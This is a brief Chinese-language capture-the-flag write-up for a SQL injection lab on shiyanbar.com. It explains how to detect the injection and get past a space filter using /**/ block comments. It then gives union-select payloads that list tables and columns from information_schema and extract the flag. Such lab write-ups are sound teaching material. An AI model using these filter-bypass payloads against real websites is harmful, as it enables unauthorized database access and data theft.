地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html
1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信息为SQLi detected!,猜测空格被过滤,直接输入’or‘1’=‘1,如下图所示,确定空格被过滤。 3.尝试使用多行注释符(块注释符) 输入‘//or//‘1‘=‘2,无任何返回,确定块注释符可以使用。 4.爆当前数据库中的表 ‘//union//select//concat(table_name)//from//information_schema.tables//where//table_schema=database()//having’1’='1 5.爆flag表中字段和值 '//union//select//concat(column_name)//from//information_schema.columns//where//table_name=‘flag’//having//‘1’='1 6. '//union//select//flag//from//flag//having//‘1’='1
